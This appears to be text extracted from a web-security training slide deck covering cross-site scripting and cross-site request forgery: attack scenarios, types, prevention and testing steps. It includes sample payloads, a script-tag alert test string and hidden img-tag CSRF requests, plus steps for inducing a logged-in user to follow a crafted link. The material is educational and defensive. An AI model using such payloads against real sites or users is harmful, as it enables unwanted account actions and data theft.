  • 17. External Source : • If an Application does not validate user input properly, user input along with malicious script gets into application. • Browser executes the script which is part of input, when it receives the data from server in the form of response. Possible Sources of User input: 1. Browsers receive information from External sources and Server. 2. Form inputs 3. Reviews or Comments 4. Query string parameter values So, improper handling of input data coming from external source is a cause of Cross site scripting.
  • 18. Sample Scenario: Server User 1 User 2 User 1 posting comment which contains <script> tags User 2 views comments page and Browser executes script User 1 steals User 2 data
  • 19. What can be done by using Cross site scripting ? • Stealing User cookies • Stealing confidential information • Malicious redirects >>Redirecting to attacker site and asking for login credentials. • Social engineering >>Injecting new HTML code and asking for Personal information, Credit card details etc. • Performing Clipboard Theft
  • 20. Types of Cross Site Scripting • Persistent XSS : Injected Script into an input field is stored in web server (database, file etc.) and same data is displayed to other users. • Reflected XSS : Injected script is not stored in server, but sent to browser directly for display purpose and browser executes the script on user browser. • DOM XSS : Injected script uses DOM data to display section of webpage and other actions of attacker intention. It does not require server side interaction. Example: document.URL, window.name etc.
  • 21. Preventing XSS • Filtering data : If user provides <script>alert(1);</script> then after filtering it becomes alert(1); So the browser simply displays the text and will not execute any instruction • Encoding data : 1. If user provides <script>alert(1);</script> then after encoding it becomes &lt;script&gt;alert(1);&lt;/script&gt; 2. When the encoded data is sent to browser, it will be displayed as <script>alert(1);</script> instead of getting executed as script Few other methods are used for Preventing XSS …
  • 22. How to Test for XSS vulnerability ? 1. Identify all input fields like HTTP parameters, POST data, hidden form field values and predefined radio or selection values. 2. Input specially crafted input data into input fields. 3. Analyze the resulting HTML response and search for input data. 4. Find the characters which are not properly encoded or filtered out. Tools like ZAP can be used for performing Cross Site Scripting testing in our web applications.
  • 23. Cross Site Request Forgery What is CSRF ? • CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently. • For example, this attack could result in a transfer of funds, changing a password, or purchasing an item in the user's context. • In effect, CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer, form submission etc.) via the target's browser without knowledge of the target user, at least until the unauthorized function has been committed.
  • 24. Sample Scenario: http://www.gmail.com/deleteAllMessages Session ID • Consider that Gmail relies only on information known to browser. • For an authenticated user, browser will automatically send cookie with subsequent requests. • Request in figure can be generated in three ways: 1. By the user 2. By the user : typing url directly 3. By the user: following external link Victim Site
  • 25. Why does CSRF usually happen ? • Web browser handling of session information such as cookies and http authentication information. • Attacker possessing knowledge of valid web application URL’s For example: https://www.example.com/myaccount/creditcards • Application relying entirely on information which is known by the browser. • Existence of HTML tags whose presence causes access to the application resources; such as <img> tag For example: <img src=https://www.example.com/deleteProduct width=“0” height=“0” >
  • 26. How does user involve in CSRF attacks ? • Following the link in an anonymous email or via chat group. Server responds to the request because User session information is automatically sent by browser with the request. • When user follows a link which refers to a page containing following HTML: <html><body> <img src=“http://www.example.com/action” > </body></html>
  • 27. Facts about CSRF • Customers of a bank in Mexico were attacked with an email with img tag. The link in img tag changed DNS entry for bank in their routers and pointed to a malicious website impersonating the bank. • About 18 million users of EBay ‘s internet auction in Korea lost their personal information. • CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list.
  • 28. How to Test for CSRF weakness in a web application ? • Consider a URL u=http://www.example.com/action • Build an HTML page which contains a http request referencing URL u. • Make sure user is logged into application. • Induce him into following the link pointing the URL to be tested. • Check if the web server is executing the request.
  • 29. Preventing CSRF attacks: • Including CSRF tokens for each user session. • Submission of double cookies. • Log out from the sensitive applications when the work is done. • Do not save any login credentials on the browser. • Using secure browser extensions.
  • 31. REFERENCES : • Owasp Testing Guide https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf • Veracode.com http://www.veracode.com/security/sql-injection • Code Project http://www.codeproject.com/Articles/877794/Preventing-XSS-in-ASP-NET- Made-Easy